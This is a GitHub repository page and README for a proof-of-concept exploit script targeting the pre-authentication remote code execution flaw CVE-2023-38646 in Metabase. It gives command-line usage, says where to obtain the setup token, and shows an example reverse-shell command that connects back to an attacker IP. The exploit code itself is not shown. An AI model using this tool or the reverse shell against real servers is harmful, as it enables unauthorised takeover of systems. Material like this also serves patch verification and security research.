Skip to content
/ CVE-2023-38646 Public

Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646)

License

Apache-2.0 license
8 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Pyr0sec/CVE-2023-38646

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

Metabase Pre-Auth RCE (CVE-2023-38646) POC

This is a python script which exploits the remote code execution vulnerability of Metabase's login software. It allows us to execute arbitrary commands on the server before authentication.

Vulnerable versions are Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1

Usage

python3 exploit.py -u URL -t TOKEN -c COMMAND

Arguments

-h, --help            show this help message and exit
-u URL, --url URL     Target URL
-t TOKEN, --token TOKEN
                      Setup-Token found in /api/session/properties
-c COMMAND, --command COMMAND
                      Command to be executed in the target host

Example

image

Command used: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1

References

Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)

About

Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646)

Resources

Readme

License

Apache-2.0 license
Activity

Stars

8 stars

Watchers

2 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages